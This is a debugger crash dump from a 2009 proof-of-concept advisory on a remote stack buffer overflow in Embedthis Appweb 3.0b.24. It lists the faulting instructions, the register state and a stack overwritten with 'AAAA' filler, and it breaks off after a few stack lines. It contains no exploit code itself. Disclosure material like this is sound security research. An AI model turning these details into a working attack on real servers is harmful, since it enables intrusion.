/***************************************************************************************
Embedthis Appweb Remote Stack Buffer Overflow PoC
Embedthis Appweb Debugging Info
-------------------------------

ASM INSTRUCTIONS
----------------
100076CD 8B0A          MOV ECX,DWORD PTR DS:[EDX]
100076CF 8B50 10       MOV EDX,DWORD PTR DS:[EAX+10]
100076D2 51            PUSH ECX
100076D3 52            PUSH EDX
100076D4 68 14040110   PUSH libappwe.10010414 ; ASCII "%s %s %s"
100076D9 55            PUSH EBP
100076DA E8 29630000   CALL <JMP.&libmpr.mprPutFmtToBuf>

DS:[00000000]=???
ECX=00000000

CPU Registers
-------------
EAX 01550080
ECX 00000000
EDX 00000000
EBX 00000072
ESP 0012FD08
EBP 01550598
ESI 00837567 ASCII "" %>s %b"
EDI 01320080
EIP 100076CD libappwe.100076CD
C 1 ES 0023 32bit 0(FFFFFFFF)
P 0 CS 001B 32bit 0(FFFFFFFF)
A 1 SS 0023 32bit 0(FFFFFFFF)
Z 0 DS 0023 32bit 0(FFFFFFFF)
S 1 FS 003B 32bit 7FFDF000(FFF)
T 0 GS 0000 NULL
D 0
O 0 LastErr ERROR_MOD_NOT_FOUND (0000007E)
EFL 00000293 (NO,B,NE,BE,S,PO,L,LE)
ST0 empty -??? FFFF 00000000 144C1A7A
ST1 empty -??? FFFF 00000000 109C62C7
ST2 empty -??? FFFF 0F3C475C 45A4876F
ST3 empty -??? FFFF 109C62C7 41264D5E
ST4 empty -??? FFFF 09AC2DB5 50CE16BD
ST5 empty -??? FFFF 00000000 17D51378
ST6 empty 0.0
ST7 empty 0.0
          3 2 1 0   E S P U O Z D I
FST 0007  Cond 0 0 0 0  Err 0 0 0 0 0 1 1 1  (GT)
FCW 027F  Prec NEAR,53  Mask 1 1 1 1 1 1

Stack
-----
Page 1/7
Embedthis Appweb 3.0b.24 Remote Buffer Overflow PoC
fl0 fl0w
08/11/2009
<---------------Corruption starts here
0012FBB8 41414141 AAAA
0012FBBC 41414141 AAAA
0012FBC0 41414141 AAA